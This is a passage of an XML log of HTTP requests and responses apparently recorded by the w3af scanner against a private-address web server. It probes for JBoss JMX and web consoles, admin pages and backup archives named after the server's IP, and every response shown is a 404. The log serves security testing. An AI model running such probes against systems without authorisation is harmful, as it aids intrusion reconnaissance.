                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="206">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="207">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="208">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="211">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="212">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="213">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="214">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="216">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="217">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="218">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="219">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="220">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="221">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="222">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="224">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="225">
                <http-request>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="227">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="228">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
